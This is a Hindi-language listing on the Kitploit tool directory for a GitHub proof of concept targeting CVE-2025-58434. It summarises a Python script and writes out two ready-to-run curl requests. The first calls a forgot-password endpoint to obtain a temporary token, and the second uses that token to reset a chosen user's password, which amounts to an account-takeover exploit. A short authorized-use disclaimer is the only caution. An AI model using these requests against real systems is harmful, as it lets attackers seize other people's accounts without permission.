Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-58434-PoC — CVE-2025-58434 Proof of Concept | Kitploit
उपकरण/GitHubGitHub/mananispiwpiw/cve-2025-58434-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmananispiwpiw/cve-2025-58434-poc

CVE-2025-58434-PoC

CVE-2025-58434 Proof of Concept

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-58434 PoC

Python प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट POST /api/v1/account/forgot-password को ट्रिगर करने के लिए।

⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए। इस उपकरण को उन सिस्टमों के विरुद्ध चलाना जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है, अवैध है।

श्रेय

  • zaddy6 (Isaac David)
  • arthurgervais (Arthur Gervais)

विवरण

  • CVE-2025-58434 के लिए PoC
  • संदर्भ: https://github.com/advisories/GHSA-wgpv-6j63-x5ph

फ़ाइलें

  • poc.py: मशीन URL/IP, बेयर होस्ट/IP उपयोग करने पर वैकल्पिक प्रोटोकॉल, लक्ष्य ईमेल और पासवर्ड के लिए संकेत देता है; फिर अनुरोध भेजता है और curl -i के समान HTTP स्थिति, हेडर और प्रतिक्रिया बॉडी प्रिंट करता है।

उपयोग

चलाएँ:

root@kitploit:~
python3 poc.py

फिर प्रदान करें:

  • मशीन URL/IP, जैसे 10.10.11.10, http://10.10.11.10, या https://target.example
  • यदि बेयर होस्ट/IP के लिए संकेत दिया जाए तो प्रोटोकॉल
  • ईमेल पता
  • पासवर्ड

समतुल्य curl

पहला अनुरोध

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<[email protected]>"}}'

दूसरा अनुरोध

root@kitploit:~
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<[email protected]>",
          "tempToken":"<tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'
टूल डाउनलोड करें